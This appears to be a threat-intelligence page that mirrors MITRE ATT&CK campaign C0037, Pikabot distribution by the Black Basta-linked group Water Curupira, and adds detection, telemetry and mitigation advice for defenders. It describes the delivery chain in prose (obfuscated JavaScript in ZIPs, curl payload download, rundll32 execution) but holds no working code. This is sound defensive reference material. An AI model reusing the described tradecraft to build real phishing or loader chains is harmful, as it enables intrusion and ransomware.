C0037: Water Curupira Pikabot Distribution
Pikabot was distributed in Water Curupira Pikabot Distribution throughout 2023 by an entity linked to BlackBasta ransomware deployment via email attachments. This activity followed the take-down of QakBot, with several technical overlaps and similarities with QakBot, indicating a possible connection. The identified activity led to the deployment of tools such as Cobalt Strike, while coinciding with campaigns delivering DarkGate and IcedID en route to ransomware deployment.[1]
Analyst context for executives and security teams
Water Curupira Pikabot Distribution matters because MITRE describes it as a 2023 email-attachment campaign distributing Pikabot, with follow-on deployment of tools such as Cobalt Strike and overlap with DarkGate, IcedID, QakBot-like activity, and ransomware-enabling operations. For leaders, the practical issue is not a single malware name: it is whether email, endpoint, and incident response controls can stop or rapidly contain a user-driven intrusion before it becomes broader tool deployment or ransomware preparation.
Executive priority
Prioritize this as an email-to-endpoint intrusion scenario that can test business resilience. Security leaders should ask whether phishing attachment defenses, user execution controls, Windows process monitoring, and rapid containment playbooks are evidenced and auditable. Because the ATT&CK object links the campaign to Pikabot, IcedID, DarkGate, Cobalt Strike deployment, and ransomware-adjacent activity, it is useful for validating budget and control coverage across managed detection, incident response readiness, and compliance evidence for anti-phishing, malware defense, and endpoint logging.
Technical view
ATT&CK provides no campaign-specific detection text and no campaign-level platform list, so defenders should drive validation from the relationships: spearphishing attachment, user execution via malicious file or link, JavaScript execution, Windows command shell, Rundll32 proxy execution, deobfuscation or decoding, ingress tool transfer, and collection of email addresses for targeting. The strongest technical review is an end-to-end test of whether email security, endpoint telemetry, script/process monitoring, and network egress visibility can correlate initial user interaction with suspicious child processes, payload transfer, decoding behavior, and follow-on tooling indicators. Windows-specific attention is supported by related software and techniques, but non-Windows exposure should be assessed only where local telemetry and affected platforms justify it.
Likely telemetry
- Email gateway and mailbox telemetry for attachments, links, sender metadata, and delivery disposition
- User interaction evidence such as attachment open, link click, or file execution events
- Endpoint process creation telemetry for cmd.exe, script interpreters, and rundll32.exe behavior
- Command-line arguments, parent-child process relationships, and file creation events around downloaded or decoded content
- Network proxy, DNS, firewall, and EDR network connection logs for external file transfer or command-and-control-like retrieval
Detection direction
- Validate correlation from phishing delivery to endpoint execution rather than relying only on attachment verdicts.
- Tune for suspicious rundll32.exe, Windows command shell, JavaScript/JScript, decoding, and external file retrieval patterns, while accounting for legitimate administrative and software activity.
- Confirm detections cover both malicious attachment and malicious link paths because the relationship set includes User Execution sub-techniques for both files and links.
- Review blind spots where email logs, endpoint process command lines, or network egress logs are missing or retained too briefly for incident reconstruction.
- Use the related malware families as threat-intelligence context for triage, but do not treat family-name detections as complete coverage for the campaign.
Mitigation priorities
- Strengthen email attachment and link controls, including detonation or analysis workflows where appropriate.
- Reduce user-execution risk with awareness, safe handling processes, and controls that restrict high-risk attachment types or script execution where business permits.
- Harden endpoint execution paths most relevant to the relationships, especially script interpreters, command shell usage, rundll32 abuse, and unauthorized payload execution.
- Ensure EDR and logging capture process creation, command lines, file writes, and network connections needed to investigate the full chain.
- Prepare incident response containment for suspected loader activity, including host isolation, mailbox search, credential risk review, and scoping for follow-on tooling.
Analyst notes and limits
The ATT&CK campaign description ties this activity to 2023 Pikabot distribution via email attachments and notes possible QakBot connection based on overlaps, plus coincidence with DarkGate and IcedID delivery en route to ransomware deployment. Treat those as source-supported context, not proof of current exposure or definitive attribution. The relationship set gives practical defensive anchors even though the campaign object itself does not specify platforms or tactics.
No official MITRE detection text is provided for this campaign, and campaign-level platforms and tactics are not specified. Any organization-specific risk rating requires local evidence: mail exposure, endpoint platform mix, logging depth, control configuration, and recent alert or incident history. This take does not claim active exploitation, customer exposure, or guaranteed detection coverage.
Water Curupira Pikabot Distribution
Pikabot was distributed in Water Curupira Pikabot Distribution throughout 2023 by an entity linked to BlackBasta ransomware deployment via email attachments. This activity followed the take-down of QakBot, with several technical overlaps and similarities with QakBot, indicating a possible connection. The identified activity led to the deployment of tools such as Cobalt Strike, while coinciding with campaigns delivering DarkGate and IcedID en route to ransomware deployment.[1]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1204.002 | Malicious File Sub-technique | Water Curupira Pikabot Distribution delivered Pikabot installers as password-protected ZIP files containing heavily obfuscated JavaScript, or IMG files containing an LNK mimicking a Word document and a malicious DLL.CitationTrendMicro Pikabot 2024 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | Water Curupira Pikabot Distribution installation via JavaScript will launch follow-on commands via cmd.exe.CitationTrendMicro Pikabot 2024 |
| Enterprise | T1204 | User Execution | Water Curupira Pikabot Distribution requires users to interact with malicious attachments in order to start Pikabot installation.CitationTrendMicro Pikabot 2024 |
| Enterprise | T1105 | Ingress Tool Transfer | Water Curupira Pikabot Distribution used Curl.exe to download the Pikabot payload from an external server, saving the file to the victim machine's temporary directory.CitationTrendMicro Pikabot 2024 |
| Enterprise | T1204.001 | Malicious Link Sub-technique | Water Curupira Pikabot Distribution distributed a PDF attachment containing a malicious link to a Pikabot installer.CitationTrendMicro Pikabot 2024 |
| Enterprise | T1589.002 | Email Addresses Sub-technique | Water Curupira Pikabot Distribution utilizes thread spoofing of existing email threads in order to execute spear phishing operations.CitationTrendMicro Pikabot 2024 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | Water Curupira Pikabot Distribution attached password-protected ZIP archives to deliver Pikabot installers.CitationTrendMicro Pikabot 2024 |
| Enterprise | T1059.007 | JavaScript Sub-technique | Water Curupira Pikabot Distribution initial delivery included obfuscated JavaScript objects stored in password-protected ZIP archives.CitationTrendMicro Pikabot 2024 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Water Curupira Pikabot Distribution used highly obfuscated JavaScript files as one initial installer for Pikabot.CitationTrendMicro Pikabot 2024 |
| Enterprise | T1218.011 | Rundll32 Sub-technique | Water Curupira Pikabot Distribution utilizes rundll32.exe to execute the final Pikabot payload, using the named exports `Crash` or `Limit` depending on the variant.CitationTrendMicro Pikabot 2024 |
Groups, software, and campaigns
S1145: Pikabot
Pikabot is a backdoor used for initial access and follow-on tool deployment active since early 2023. Pikabot is notable for extensive use of multiple encoding, encryption, and defense evasion mechanisms to evade defenses and avoid analysis. Pikabot has some overlaps with QakBot, but insufficient evidence exists to definitively link these two malware families. Pikabot is frequently used to deploy follow on tools such as Cobalt Strike or ransomware variants.[1][2][3]
S1111: DarkGate
DarkGate first emerged in 2018 and has evolved into an initial access and data gathering tool associated with various criminal cyber operations. Written in Delphi and named "DarkGate" by its author, DarkGate is associated with credential theft, cryptomining, cryptotheft, and pre-ransomware actions.[1] DarkGate use increased significantly starting in 2022 and is under active development by its author, who provides it as a Malware-as-a-Service offering.[2]
S0483: IcedID
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 6b61cb2d7ec0… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
TrendMicro Pikabot 2024
Shinji Robert Arasawa, Joshua Aquino, Charles Steven Derion, Juhn Emmanuel Atanque, Francisrey Joshua Castillo, John Carlo Marquez, Henry Salcedo, John Rainier Navato, Arianne Dela Cruz, Raymart Yambot & Ian Kenefick. (2024, January 9). Black Basta-Affiliated Water Curupira’s Pikabot Spam Campaign. Retrieved July 17, 2024.
Open source URL -
[2]
mitre-attack C0037Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.